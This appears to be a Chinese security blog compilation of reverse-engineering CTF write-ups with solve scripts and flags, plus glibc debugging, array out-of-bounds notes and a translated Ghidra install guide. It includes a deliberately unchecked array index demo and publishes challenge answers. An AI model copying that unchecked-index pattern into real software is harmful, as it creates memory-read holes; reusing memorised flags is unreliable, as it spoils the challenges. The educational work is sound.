xman2019-reverse

十天的训练赛

1.Re1-100

IDA 查看主要逻辑

check_flag

1
2
responseTrue(); #flag正确
responseFalse(); #flag错误
1
strncmp(bufParentRead, "{daf29f59034938ae4efd53fc275d81053ed5be8c}", 0x2AuLL)

经过变换后的 flag 和 {daf29f59034938ae4efd53fc275d81053ed5be8c} 对比

退回上一层的检查:

confuseKey(bufParentRead, 42)

confuseKey

可以看到是把一个字符串分割成了四段然后重组 3 4 1 2

1
2
原文:{daf29f5903 4938ae4efd 53fc275d81 053ed5be8c}
重组:{53fc275d81 053ed5be8c 4938ae4efd daf29f5903}

往上看那几个判断

1
2
strncmp(&bufParentRead[31], "4938ae4efd", 10uLL)
strncmp(&bufParentRead[1], "53fc275d81", 10uLL)

31 到 41 位是 4938ae4efd

1 到 11 位是 53fc275d81

对得上flag就是 {53fc275d81053ed5be8c4938ae4efddaf29f5903}

2.APK-逆向2

这个东西是个 .net 文件 当时我傻傻的拿 IDA 去看,问了一下队友,用 dnSpy

看到程序启动后会连接到本地的 31337 端口然后就把一个 CTF{ 开头的东西发给我们

我用的是 ncat 监听本地的 31337 端口

1
ncat -kl 31337

打开文件得到flag

3.Shuffle

这个没什么好说的

4.key

IDA 打开发现是个 C++ 很多函数,一开始我是手逆,逆了几个,被劝退了

后面动态调试,在 sub_4020C0 函数(这个就是最终检查 flag 的函数)下断点

flag 就是 eax 中的 “idg_cni~bjbfi|gsxb”

5.zorropub

这个题我用了极其暴力的一种做法

这是一个 MD5

然后你输入一个大于等于 16 小于 0xFFF 的东西,后面验证通过就会给你 flag

我把服务挂到本机的 4444 端口

1
ncat -vc zorro_bin -kl 4444

然后就是

6.babymips

给的是一个 mips 指令的 ELF

我是用 ghidra 逆

main 函数:

1
2
3
4
5
6
scanf("%32s",ipt);
i = 0;
while (i < 0x20) {
   ipt[i] = ipt[i] ^ 0x20U - (char)i;
   i = i + 1;
}

这里的加密是把我们的输入和 0x20 - i 异或了一遍

这里要注意的是运算符的优先级

先是 - 然后才是 ^

然后把前五位和 _fdata( Q|j{g ) 进行对比

解出前五位

1
2
3
4
5
enc = "Q|j{g"
msg = ''
for i in range(len(enc)):
	msg += chr(ord(enc[i]) ^ 0x20 - i)
print msg

得到 :qctf{

分析flag后 27 位的加密 :

1
2
3
4
5
6
7
8
9
while (flag_len = strlen(ipt), i < flag_len) {
    if ((i & 1) == 0) {
        ipt[i] = ((int)ipt[i] << 0x1a) >> 0x18) | ipt[i] >> 6;
    }
    else {
        ipt[i] = ipt[i] >> 2 | ((int)ipt[i] << 0x1e) >> 0x18);
    }
    i = i + 1;
}

这个主要是交换了二进制位的位置

例如:字符的二进制位(数字代表位置不是立即数):

76543210

(i & 1) == 0 代表下标为偶数

((int)ipt[i] << 0x1a) >> 0x18) | ipt[i] >> 6;

先是 << 0x1a

相当于变成了:7654321000000000000000000000000000

>> 0x18 变成了 :7654321000

ipt[i] >> 6 得出:76

现在把第七第六位(76)|(7654321000)

变成了7654321076

下标为单数的同理

然后是最后一步的验证:

1
2
3
4
5
6
7
iVar1 = strncmp(ipt + 5,enc,0x1b);
if (iVar1 == 0) {
   puts("Right!");
}
else {
   puts("Wrong!");
   }

enc可以在我截图的左栏看到

双击 enc 再双击 DAT_00400b98 就有

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
                  DAT_00400b98                                    XREF[2]:     encrypto:0040094c(*), 
                                                                                  00410d04(*)  
00400b98 52              ??         52h    R
00400b99 fd              ??         FDh
00400b9a 16              ??         16h
00400b9b a4              ??         A4h
00400b9c 89              ??         89h
00400b9d bd              ??         BDh
00400b9e 92              ??         92h
00400b9f 80              ??         80h
00400ba0 13              ??         13h
00400ba1 41              ??         41h    A
00400ba2 54              ??         54h    T
00400ba3 a0              ??         A0h
00400ba4 8d              ??         8Dh
00400ba5 45              ??         45h    E
00400ba6 18              ??         18h
00400ba7 81              ??         81h
00400ba8 de              ??         DEh
00400ba9 fc              ??         FCh
00400baa 95              ??         95h
00400bab f0              ??         F0h
00400bac 16              ??         16h
00400bad 79              ??         79h    y
00400bae 1a              ??         1Ah
00400baf 15              ??         15h
00400bb0 5b              ??         5Bh    [
00400bb1 75              ??         75h    u
00400bb2 1f              ??         1Fh
00400bb3 00              ??         00h
1
enc = 52 FD 16 A4 89 BD 92 80 13 41 54 A0 8D 45 18 81 DE FC 95 F0 16 79 1A 15 5B 75 1F 00

完整的脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
enc = b'\x52\xFD\x16\xA4\x89\xBD\x92\x80\x13\x41\x54\xA0\x8D\x45\x18\x81\xDE\xFC\x95\xF0\x16\x79\x1A\x15\x5B\x75\x1F'
flag_head = b'Q|j{g'
flag = ''

for i in range(5):
    flag += chr(ord(flag_head[i]) ^ 0x20 - i)


for i in range(27):
    if i % 2 == 1:
      	#取 enc[i] 的 (前 6 个 bit >> 2) 或上 enc[i] 的 (后两个 bit << 6)
        flag += chr((((ord(enc[i]) & 0b11111100) >> 2 ) | ((ord(enc[i]) & 0b00000011) << 6 )) ^ 0x20 - 5 - i)
    else:
      	#取 enc[i] 的 (后 6 个 bit << 2) 或上 enc[i] 的 (前两个 bit >> 6)
        flag += chr((((ord(enc[i]) & 0b00111111) << 2 ) | ((ord(enc[i]) & 0b11000000) >> 6 )) ^ 0x20 - 5 - i)

print(flag)

7.secret-galaxy

这个运行了没啥输入的地方,看代码也看不出啥(我太菜了),就 OD 运行完了之后 搜字符串,得到 flag

8.serial

这个东西有花指令

写个脚本去花:

展开全文 >>

glibc_debug

关于源码及调式 glibc 我以前想的是编译带 symbol 的 libc 但是失败了,太麻烦了,所以我在网上找到了一种更方便的方法

1.首先 去注释 源码源,就是那些 # deb-src 开头的

1
sudo sed -i "s/# deb-src/deb-src/g" /etc/apt/sources.list

如果 /etc/apt/sources.list 里面没有的话自己百度找到符合的源添加

2. update

1
sudo apt update

3.安装带 debug symbol 的 libc

1
sudo apt install libc6-dev

4.获取 libc6-dev 的源码

1
apt source libc6-dev

完事后你会发现当前文件夹下面会有一个 glibc-xxx 的文件夹,这就是源码

就比如我们要在 gdb 中 debug 时能查看 malloc 的源码我们可以这样做

我的是 ubuntu16 glibc-2.23

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
root@82374599b04f:~# cd glibc-2.23
root@82374599b04f:~/glibc-2.23# find ./ -name "malloc.c"
./malloc/malloc.c
./.pc/any/cvs-harden-glibc-malloc-metadata.patch/malloc/malloc.c
./.pc/git-updates.diff/malloc/malloc.c

#可以看到malloc.c 位于 ./malloc/malloc.c

root@82374599b04f:~/glibc-2.23# pwd
/root/glibc-2.23

#那么它的路径就在 /root/glibc-2.23/malloc/malloc.c
#现在我们来试试

root@82374599b04f:~/glibc-2.23# cd
root@82374599b04f:~# cat t.c
#include<stdio.h>
#include<stdlib.h>

int main(void)
{
  int *var_a = malloc(8);

  fprintf(stderr, "malloc(8): %p\n", var_a);

  free(var_a);
  return 0;
}
root@82374599b04f:~# gcc -g t.c -o malloc
root@82374599b04f:~# gdb malloc

gdb操作:

1
2
3
4
(gdb) b main
Breakpoint 1 at 0x4005fa
(gdb) directory /root/glibc-2.23/malloc
(gdb) lay src

然后运行到 malloc 那一行的时候就一直 si

就能看到有源码了,先进入的是 dl

dl-trampoline.h

然后是 malloc.c

malloc.c

5.总结

malloc 只是个演示

debug 别的函数也是一样

1.先找到源文件的位置

2.然后在 gdb 里 directory

3.步入那个函数就OK

展开全文 >>

关于内存中的数组和数组越界

读了

逆向知识十三讲,汇编中数组的表现形式,以及还原数组

[原创]数组越界之入门向

有感就瞎写这个笔记

实践就用这个代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
//arr.c
#include<stdio.h>
int
main ()
{
  int minus_one = -1;
  char arr[8] = "testAr";
  int i;
  unsigned int uint; //数组下标就是无符号的
  while (1)
    {
      scanf ("%d", &i);
      printf("var i : %d\n",i);
      uint = i;
      printf("index array : %u\n",uint);
      printf ("%c\n", arr[i]);
    }
  return 0;
}

我编译好的:

1
git clone https://github.com/zero-MK/arrOF

编译运行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
mk at ubuntu in ~/disk/CTF/pwn/temp
$ gcc -fno-stack-protector -g arr.c -o arr

mk at ubuntu in ~/disk/CTF/pwn/temp
$ ./arr
-1
var i : -1
array index: 4294967295

-2
var i : -2
array index : 4294967294

1
var i : 1
array index : 1
e

至于为什么会这样请看:

CTF-all-in-one 的整数溢出

gdb 载入

反汇编 main 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000000000400596 <+0>:	push   rbp
   0x0000000000400597 <+1>:	mov    rbp,rsp
   0x000000000040059a <+4>:	sub    rsp,0x30
   0x000000000040059e <+8>:	mov    QWORD PTR [rbp-0x8],0xffffffffffffffff
   0x00000000004005a6 <+16>:	movabs rax,0x724174736574
   0x00000000004005b0 <+26>:	mov    QWORD PTR [rbp-0x20],rax
=> 0x00000000004005b4 <+30>:	lea    rax,[rbp-0x24]
   0x00000000004005b8 <+34>:	mov    rsi,rax
   0x00000000004005bb <+37>:	mov    edi,0x4006a4
   0x00000000004005c0 <+42>:	mov    eax,0x0
   0x00000000004005c5 <+47>:	call   0x400480 <__isoc99_scanf@plt>
   0x00000000004005ca <+52>:	mov    eax,DWORD PTR [rbp-0x24]
   0x00000000004005cd <+55>:	mov    esi,eax
   0x00000000004005cf <+57>:	mov    edi,0x4006a7
   0x00000000004005d4 <+62>:	mov    eax,0x0
   0x00000000004005d9 <+67>:	call   0x400460 <printf@plt>
   0x00000000004005de <+72>:	mov    eax,DWORD PTR [rbp-0x24]
   0x00000000004005e1 <+75>:	mov    DWORD PTR [rbp-0xc],eax
   0x00000000004005e4 <+78>:	mov    eax,DWORD PTR [rbp-0xc]
   0x00000000004005e7 <+81>:	mov    esi,eax
   0x00000000004005e9 <+83>:	mov    edi,0x4006b3
   0x00000000004005ee <+88>:	mov    eax,0x0
   0x00000000004005f3 <+93>:	call   0x400460 <printf@plt>
   0x00000000004005f8 <+98>:	mov    eax,DWORD PTR [rbp-0x24]
   0x00000000004005fb <+101>:	cdqe   
   0x00000000004005fd <+103>:	movzx  eax,BYTE PTR [rbp+rax*1-0x20]
   0x0000000000400602 <+108>:	movsx  eax,al
   0x0000000000400605 <+111>:	mov    esi,eax
   0x0000000000400607 <+113>:	mov    edi,0x4006c5
   0x000000000040060c <+118>:	mov    eax,0x0
   0x0000000000400611 <+123>:	call   0x400460 <printf@plt>
   0x0000000000400616 <+128>:	jmp    0x4005b4 <main+30>
End of assembler dump.

看到了吗 

1
0x000000000040059e <+8>:	mov    QWORD PTR [rbp-0x8],0xffffffffffffffff

c code 就是 int minus_one = -1;

数组元素在栈中的布局:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
           低地址
+--------------------------+<--- [rbp - 0x20 - 0x10]
|         数组下标          |          
+--------------------------+<--- [rbp - 0x20]
|         arr[0]           |
+--------------------------+
|         arr[1]           |
+--------------------------+
|         arr[2]           |
+--------------------------+
|         arr[..]          |
+--------------------------+
|           ...            |
+--------------------------+
|           rbp            |
+--------------------------+
|           ret            |
+--------------------------+
           高地址

现在知道

数组下标在:[rbp - 0x20 - 0x10](0x7fffffffda60)

我们输入 1

看到 stack 上的内容

1
2
3
4
5
6
7
00:0000│ rsp  0x7fffffffda60 —▸ 0x7fffffffda8e ◂— 0x400620ffff
01:0008│      0x7fffffffda68 ◂— 0x100000000 /* 看到了吗,数组下标为 0x1 (高 8 位无效,下面解释) */
02:0010│      0x7fffffffda70 ◂— 0x724174736574 /* 'testAr' */
03:0018│      0x7fffffffda78 —▸ 0x4004a0 (_start) ◂— xor    ebp, ebp
04:0020│      0x7fffffffda80 ◂— 0x1ffffdb70
05:0028│      0x7fffffffda88 ◂— 0xffffffffffffffff
06:0030│ rbp  0x7fffffffda90 —▸ 0x400620 (__libc_csu_init) ◂— push   r15

数组的内容存在:[rbp - 0x20](0x7fffffffda70)

1
2
3
4
5
6
gdb-peda$ p $rbp-0x20
$17 = (void *) 0x7fffffffda70
gdb-peda$ x $rbp-0x20
0x7fffffffda70:	0x0000724174736574
gdb-peda$ x/s $rbp-0x20
0x7fffffffda70:	"testAr"

寻找数组的元素,rbp - 0x24 是我们的输入 i 

1
2
3
0x4005f8 <main+98>     mov    eax, dword ptr [rbp - 0x24]
0x4005fb <main+101>    cdqe   
0x4005fd <main+103>    movzx  eax, byte ptr [rbp + rax - 0x20]

可以看出 rbp-0x20就是我们数组的首元素的位置,我们输入 0 相当于 arr[0]rbp + 0 - 0x20 

1
2
3
4
5
6
gdb-peda$ set $eax = 0
gdb-peda$ x/c $rbp + $rax - 0x20
0x7fffffffda70:	0x74 //字符 t 
gdb-peda$ set $eax = 1
gdb-peda$ x/c $rbp + $rax - 0x20
0x7fffffffda71:	0x65 ////字符 e

当我们输入 -1 时

stack 上的内容:

1
2
3
4
5
6
7
00:0000│ rsp  0x7fffffffda60 —▸ 0x7fffffffda8e ◂— 0x400620ffff
01:0008│      0x7fffffffda68 ◂— 0xffffffff00000000 /* 看到了吗,数组下标为 0xffffffff */
02:0010│      0x7fffffffda70 ◂— 0x724174736574 /* 'testAr' */
03:0018│      0x7fffffffda78 —▸ 0x4004a0 (_start) ◂— xor    ebp, ebp
04:0020│      0x7fffffffda80 ◂— 0xffffffffffffdb70
05:0028│      0x7fffffffda88 ◂— 0xffffffffffffffff
06:0030│ rbp  0x7fffffffda90 —▸ 0x400620 (__libc_csu_init) ◂— push   r15
1
2
3
4
gdb-peda$ p $eax
$20 = 0xffffffff
gdb-peda$ p $rax
$21 = 0xffffffff

[rbp + rax - 0x20] 就变成了 [rbp + 0xffffffff - 0x20]

读到的是 [rbp + 0xffffffff - 0x20]

rax 的值(低 16 位,也就是 eax,因为是 mov eax, dword ptr [rbp - 0x24] )是可控的

如果精心构造 payload 就能任意读高地址的东西

如果现在是一个 scanf 就能任意写高地址上的东西

展开全文 >>

re_base64

题目来自: bugku—re—love

ida F5 看到 main 函数调用 main_0()

看到 sub_4110BF 处理后得结果和 Str2 进行比较, 吻合则说明 flag 正确

得在 .data 段找到 Str2

1
e3nifIH9b_C@n@dH

先解决位移

1
2
3
v8 = j_strlen(Dest);
for ( j = 0; j < v8; ++j )
    Dest[j] += j;

就是把 Dest 数组里的的每一个字符位移 j

slove:

1
2
3
4
5
6
fake_flag0 = ''
fake_flag = "e3nifIH9b_C@n@dH"
for i in range(len(fake_flag)):
	fake_flag0 += chr(ord(fake_flag[i]) - i)
print fake_flag0
#得到:e2lfbDB2ZV95b3V9

现在进入 sub_4110BF 函数 再进入 sub_411AB0 (为了方便分析我把部分变量重命名了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
void *__cdecl sub_411AB0(char *ipt_str, unsigned int len, int *out_str)
{
  int v4; // STE0_4
  int v5; // STE0_4
  int v6; // STE0_4
  int v7; // [esp+D4h] [ebp-38h]
  signed int i; // [esp+E0h] [ebp-2Ch]
  unsigned int v9; // [esp+ECh] [ebp-20h]
  int v10; // [esp+ECh] [ebp-20h]
  signed int v11; // [esp+ECh] [ebp-20h]
  void *Dst; // [esp+F8h] [ebp-14h]
  char *v13; // [esp+104h] [ebp-8h]

  //检查我们的输入是不是为空
  if ( !ipt_str || !len )
    return 0;
  v9 = len / 3;
  //如果字符长度不能被 3 整除
  if ( (signed int)(len / 3) % 3 )
    ++v9;
  v10 = 4 * v9;
  *out_str = v10;
  Dst = malloc(v10 + 1);
  if ( !Dst )
    return 0;
  //把 v10 全部置零
  j_memset(Dst, 0, v10 + 1);
  v13 = ipt_str;
  v11 = len;
  v7 = 0;
  while ( v11 > 0 )
  {
    treeCharBuf[2] = 0;
    treeCharBuf[1] = 0;
    treeCharBuf[0] = 0;
    //每次取 v13 三个字符 也就是我们的输入(ipt_str) 赋给 treeCharBuf
    for ( i = 0; i < 3 && v11 >= 1; ++i )
    {
      treeCharBuf[i] = *v13;
      --v11;
      ++v13;
    }
    if ( !i )
      break;
    //这里我们就看 case 3 就行 
    //因为我们刚刚解出的字符串长度为 16 正好能被 3 整除
    //所以每次 i 都会是 3
    switch ( i )
    {
      case 1:
        *((_BYTE *)Dst + v7) = aAbcdefghijklmn[(signed int)(unsigned __int8)treeCharBuf[0] >> 2];
        v4 = v7 + 1;
        *((_BYTE *)Dst + v4++) = aAbcdefghijklmn[((treeCharBuf[1] & 0xF0) >> 4) | 16 * (treeCharBuf[0] & 3)];
        *((_BYTE *)Dst + v4++) = aAbcdefghijklmn[64];
        *((_BYTE *)Dst + v4) = aAbcdefghijklmn[64];
        v7 = v4 + 1;
        break;
      case 2:
        *((_BYTE *)Dst + v7) = aAbcdefghijklmn[(signed int)(unsigned __int8)treeCharBuf[0] >> 2];
        v5 = v7 + 1;
        *((_BYTE *)Dst + v5++) = aAbcdefghijklmn[((treeCharBuf[1] & 0xF0) >> 4) | 16 * (treeCharBuf[0] & 3)];
        *((_BYTE *)Dst + v5++) = aAbcdefghijklmn[((treeCharBuf[2] & 0xC0) >> 6) | 4 * (treeCharBuf[1] & 0xF)];
        *((_BYTE *)Dst + v5) = aAbcdefghijklmn[64];
        v7 = v5 + 1;
        break;
      case 3:
         //把 treeCharBuf[0] 的进行 右位移(2) 位运算 
         //取高 6 位来索引 aAbcdefghijklmn 数组中的字符
        *((_BYTE *)Dst + v7) = aAbcdefghijklmn[(signed int)(unsigned __int8)treeCharBuf[0] >> 2];
        v6 = v7 + 1;
         
        //把 treeCharBuf[1] 和 0xF0(二进制:11110000)进行 & 运算 再位移 4 获得高 4bit
        //拼接 treeCharBuf[0] 的低 2 位来索引 aAbcdefghijklmn 数组中的字符
        *((_BYTE *)Dst + v6++) = aAbcdefghijklmn[((treeCharBuf[1] & 0xF0) >> 4) | 16 * (treeCharBuf[0] & 3)];
            
        //把 treeCharBuf[2] 和 0xC0(二进制:11000000)进行 & 运算 再位移 6 获得高 2bit
        //拼接 treeCharBuf[1] 的低 4 位来索引 aAbcdefghijklmn 数组中的字符
        *((_BYTE *)Dst + v6++) = aAbcdefghijklmn[((treeCharBuf[2] & 0xC0) >> 6) | 4 * (treeCharBuf[1] & 0xF)];
         
        //把 treeCharBuf[2] 和 0x3F(二进制:00111111)进行 & 运算
        //取得 treeCharBuf[2] 低 6bit 索引 aAbcdefghijklmn 数组中的字符
        *((_BYTE *)Dst + v6) = aAbcdefghijklmn[treeCharBuf[2] & 0x3F];
        v7 = v6 + 1;
        break;
    }
  }
  *((_BYTE *)Dst + v7) = 0;
  return Dst;
}

在 .rdata 段 拿到 aAbcdefghijklmn 数组

1
.rdata:00417B30 aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='

看得出来就是 base64

1
2
3
4
5
6
7
8
9
10
import base64
fake_flag0 = ''
fake_flag = "e3nifIH9b_C@n@dH"
for i in range(len(fake_flag)):
	fake_flag0 += chr(ord(fake_flag[i]) - i)
#print fake_flag0
#得到:e2lfbDB2ZV95b3V9
flag = base64.b64decode(fake_flag0)
print flag
#{i_l0ve_you}

展开全文 >>

ghidra

前几天看到 NSA 放出来的一个 re 工具,这几天有点忙,今天才安排上的,打开的时候确实有点小惊喜,个人感觉比 IDA 看得舒服,但是算是各有所长吧,废话少说上图

既然能用到这种专业性那么强的东西各种功能就不用我介绍了吧

原本的安装指南是英语,有的人看了脑阔疼,我就瞎翻译一下(机翻+校对),个人能力有限如果有错请邮件告诉我:1565328054@qq.com

Ghidra安装指南

所提供的安装信息自Ghidra 9.0起生效,未来版本可能会有所变化。

平台支持

  • Microsoft Windows 7 或 10(64位)
  • Linux(64位,CentOS 7 是首选)
  • macOS(OS X)10.8.3+( Mountain Lion 或更高版本)

注意:现在不推荐使用32位操作系统安装。如果您有特殊需求,请联系Ghidra团队。

最低要求

硬件

  • 4 GB RAM
  • 1 GB存储空间(用于安装的Ghidra二进制文件)
  • 双显示器(强烈建议)

软件

  • Java 11和开发工具包(JDK)(参见Java Notes

    • 建议从jdk.java.net下载OpenJDK

返回页首

###

安装Ghidra

要安装 Ghidra,使用任何解压缩程序(内置 OS 实用程序,7-Zip,WinZip,WinRAR等)将 Ghidra 官网提供的压缩包解压缩到所需的路径

安装说明

  • Ghidra 不使用传统的安装程序。相反,Ghidra 分发文件只是在文件系统上就地提取。这种方法有优点和缺点。从好的方面来说,安装 Ghidra 供个人使用不需要管理权限。此外,由于安装 Ghidra 不会更改任何操作系统配置,例如 Windows 上的注册表,因此删除 Ghidra 就像删除 Ghidra 安装目录一样简单。在不好方面,Ghidra 不会自动在桌面上创建快捷方式或显示在应用程序开始菜单中。
  • 可能需要管理权限才能将 Ghidra 提取到某些文件系统目标(例如C:\),以及将 Ghidra Server 安装为服务。
  • Ghidra 依赖于使用其安装目录之外的目录来管理临时和长时间保存的缓存文件。Ghidra 尝试使用专为此目的而设计的标准操作系统目录,以避免出现多个问题,例如将大量数据存储到漫游配置文件中。如果怀疑这些目录的默认位置导致问题,可以通过修改support/launch.properties文件中的相关属性来更改它们 。

Java Notes

  • Ghidra 需要在 PATH 上运行受支持的 Java Runtime 和 Development Kit 版本。但是,如果 PATH 上有一个Ghidra 不支持的 Java 版本,它将使用该版本的 Java(如果是 1.7 或更高版本)来帮助您在系统上找到支持的版本。如果无法自动定位,将提示用户输入要使用的 Java 主目录的路径( Java 主目录是 Java 的 bin 目录的父目录)。这最大限度地减少了 Ghidra 对预先存在的 Java 配置的影响。

  • Ghidra 是针对从 jdk.java.net 发布的 OpenJDK 开发和测试的。使用此 OpenJDK 发行版以获得最稳定的体验。

  • 如果 PATH 上没有 Java 而导致 Ghidra 无法运行, 则应手动安装受支持的 JDK 并将其添加到 PATH 中。以下步骤概述了如何将 OpenJDK 添加到操作系统的 PATH 。

    • Windows:将 JDK 发行版(.zip文件)解压缩到所需位置,并将 JDK 的 bin 目录添加到 PATH :

      1. 提取JDK:

        1. 右键单击zip文件,然后单击Extract All …
        2. 单击“ 提取”

      2. 打开环境变量窗口:

        1. Windows 10:右键单击Windows开始按钮,单击“ 系统”,然后点击“系统信息”

          Windows 7:单击Windows开始按钮,右键单击“计算机”,然后单击“ 属性”

        2. 单击高级系统设置

        3. 单击环境变量…

      3. 将 JDK bin 目录添加到 Path 变量:

        1. 在系统变量下,突出显示路径并单击 编辑…
        2. 在“ 变量值字段的末尾,添加一个分号(;),(译者注:我的win10是进去后点击新建)后跟 <提取的JDK目录的路径>\bin
        3. 单击确定
        4. 单击 确定
        5. 单击 确定

      4. 重新启动任何打开的命令提示符窗口以使更改生效

    • Linux和macOS(OS X):将 JDK 发行版(.tar.gz文件)解压缩到所需位置,并将 JDK 的 bin 目录添加到 PATH :

      1. 提取JDK:

        1
        tar xvf <JDK distribution.tar.gz>

      2. 用您选择的编辑器打开〜/.bashrc。例如:

        1
        vi ~/.bashrc

      3. 在文件的最后,将JDK bin目录添加到PATH变量:

        1
        export PATH=<提取的JDK目录的路径>/bin:$PATH

      4. 保存存档

      5. 重新启动打开的终端窗口以使更改生效

  • 在某些情况下,您可能希望 Ghidra 使用特定版本的 Java 启动,而不是 Ghidra 自动定位的版本。要强制 Ghidra 使用特定版本的 Java 启动,请在 support / launch.properties 文件中设置 JAVA_HOME_OVERRIDE 属性。如果此属性设置的 Java 为不兼容版本,Ghidra 将恢复为自动查找兼容版本。请注意,某些 Java 仍必须位于 PATH 上,以便 Ghidra 使用 JAVA_HOME_OVERRIDE 属性。这一限制将在未来的 Ghidra 版本中得到解决。

返回页首

Ghidra安装目录布局

安装 Ghidra 后,可运行的软件将被解压缩到我们将称为 <GhidraInstallDir> 的新目录。下面是对分发文件的提取完成后可以在 <GhidraInstallDir> 中找到的顶级目录和文件的描述。

Ghidra Ghidra发行版的基本目录。包含运行Ghidra所需的文件
Extensions 可选组件,可扩展Ghidra的功能并将Ghidra与其他工具集成。 有关详细信息,请参阅“ 扩展”部分。
GPL 独立的GPL支持计划。
server 包含与 Ghidra Server 安装和管理相关的文件。
support 包含用于调试Ghidra,在高级模式下运行 Ghidra 以及控制 Ghidra 如何启动的文件。
docs 包含Ghidra的文档,例如发行说明,API文件,教程等。
ghidraRun(.bat) 用于启动 Ghidra 的脚本。
LICENSE.txt Ghidra 许可证信息。
licenses 包含 Ghidra 使用的许可证。

返回页首

运行Ghidra

GUI模式

  1. 导航到<GhidraInstallDir>

  2. 运行ghidraRun.bat(Windows)或 ghidraRun(Linux或macOS)

    如果 Ghidra 无法启动,请参阅 “故障排除和帮助”部分。

Ghidra服务器

Ghidra 可以支持多个用户在一个项目上一起工作。各个 Ghidra 用户启动并处理他们自己的特定 Ghidra 项目的本地副本,检查更改到包含该存储库的所有提交的公共存储库。有关安装/配置 Ghidra Server 的详细信息,请参阅 <GhidraInstallDir> /server/svrREADME.html 文件。

Headless (Batch) 模式

Ghidra 传统上以 GUI 模式运行。但是,它也能够使用命令行在Headless (Batch) 模式下运行。有关更多信息,请参阅 <GhidraInstallDir> /support/analyzeHeadlessREADME.html 文件。

运行单个 Jar

通常, Ghidra 作为整个目录结构安装,允许模块化包含或删除功能集,还提供许多可以扩展或配置的文件。但是,有时将 Ghidra 的全部或部分子集压缩到单个 jar 文件中会牺牲配置选项。这使得 Ghidra 更容易在Headless (Batch)操作的命令行运行,或者用作另一个 Java 应用程序的逆向工程功能库。

可以使用<GhidraInstallDir>/support/buildGhidraJar 脚本创建单个 ghidra.jar 文件 。

返回页首

扩展

扩展是可选组件,可以:

  • 通过实验性或用户贡献的 Ghidra 插件或分析器扩展 Ghidra 的功能。
  • 将其他工具与 Ghidra 集成,例如 Eclipse 或 IDA Pro 。

Ghidra 附带了以下可供使用的扩展(默认情况下不装载),可在 <GhidraInstallDir>/Extensions 目录中找到。

  • Eclipse:用于预先存在的 Eclipse 安装 GhidraDev Eclipse 插件。有关安装和使用 GhidraDev Eclipse 插件的信息,请参阅 <GhidraInstallDir>/Extensions/Eclipse/GhidraDev/GhidraDev_README.html。
  • Ghidra: Ghidra扩展(以前称为 contribs )。有关更多信息,请参阅 Ghidra扩展说明
  • IDAPro:用于让 Ghidra 使用 IDAPro 插件/装载器。

Ghidra扩展说明

  • Ghidra 扩展程序旨在从 Ghidra 前端 GUI 安装和卸载:

    1. 单击File → Install Extensions…
    2. 复选框中的 install extensions ; 取消选中 uninstall extensions 的框
    3. 重新启动 Ghidra 以使更改生效

  • 如果用户没有对 <GhidraInstallDir> 的写入权限,则安装或卸载 Ghidra 扩展可能会失败。如果用户从共享安装位置运行 Ghidra ,则可能会发生这种情况。在这种情况下, Ghidra 安装目录的所有者将负责管理Ghidra 特定安装所使用的 Ghidra 扩展。

  • 当 Ghidra GUI 不可用时,可以手动安装和卸载 Ghidra 扩展。如果系统管理员代表用户管理共享 Ghidra 安装的 Ghidra 扩展,或者用户希望将扩展安装到 headlessly 使用的 Ghidra 安装中,则可能需要这样做。

要在这些情况下安装扩展,只需将所需的 Ghidra 扩展存档文件解压缩到 <GhidraInstallDir>/Ghidra/Extensions 目录即可。例如,在 Linux 或 macOS 上:

  1. 将当前目录设置为<GhidraInstallDir>目录:

  2. 1
    cd <GhidraInstallDir>/Ghidra/Extensions

  3. 将所需的扩展存档文件解压缩到当前目录:

  4. 1
    unzip ../../Extensions/Ghidra/<extension>.zip

  5. 下次 Ghidra 启动时将安装扩展程序。

    要卸载扩展,只需从 <GhidraInstallDir>/Ghidra/Extensions 中删除提取的扩展目录 。下次 Ghidra 启动时,将卸载扩展程序。

    注意:如果有一个 Ghidra 运行实例在尝试删除的扩展目录上保存文件锁,则可能无法以这种方式卸载扩展。

返回页首

Ghidra开发

用户可以通过开发自定义 Ghidra 脚本,插件,分析器等 来扩展 Ghidra 的功能。

Ghidra 通过提供一个名为 GhidraDev 的自定义 Eclipse 插件来支持 Eclipse 中的开发,该插件可以在 <GhidraInstallDir>/Extensions/Eclipse 目录中找到。有关安装和使用 GhidraDev Eclipse 插件的更多信息,请参阅<GhidraInstallDir>/Extensions/Eclipse/GhidraDev/GhidraDev_README.html。

注意: Ghidra 不提供 Eclipse 。GhidraDev Eclipse 插件旨在预先存在的 Eclipse 中安装。

返回页首

升级说明

一般升级说明

!!!很重要!!!首先备份您的旧项目! !!!很重要!!!通过手动将 .rep 目录和 .gpr 文件从任何 Ghidra 项目目录复制到文件系统上的安全位置进行备份。默认情况下,新安装的 Ghidra 将使用用户最新版 Ghidra 中保存的配置文件。这允许任何已保存的工具配置自动移植到新项目。但是,这也可能会阻止在某些情况下自动配置新工具选项和功能。要打开包含最新配置的新工具,用户应从项目管理器窗口中选择Tools → Default Tools…当您打开使用以前版本的 Ghidra 创建的程序时,系统将提示您升级程序,然后才能打开它。在保存之前,升级不会覆盖旧文件。如果您将其保存(原始文件),您将无法再使用旧版 Ghidra 打开它。但是,您可以选择执行“Save As”,创建新文件并保持旧版本不变。请务必小心升级共享程序文件,因为访问该文件的每个人都必须升级其安装的 Ghidra 。

Ghidra Server 升级说明

有关升级 Ghidra Server 的详细信息, 请参阅<GhidraInstallDir> /server/svrREADME.html文件。

返回页首

故障排除和帮助

启动Ghidra

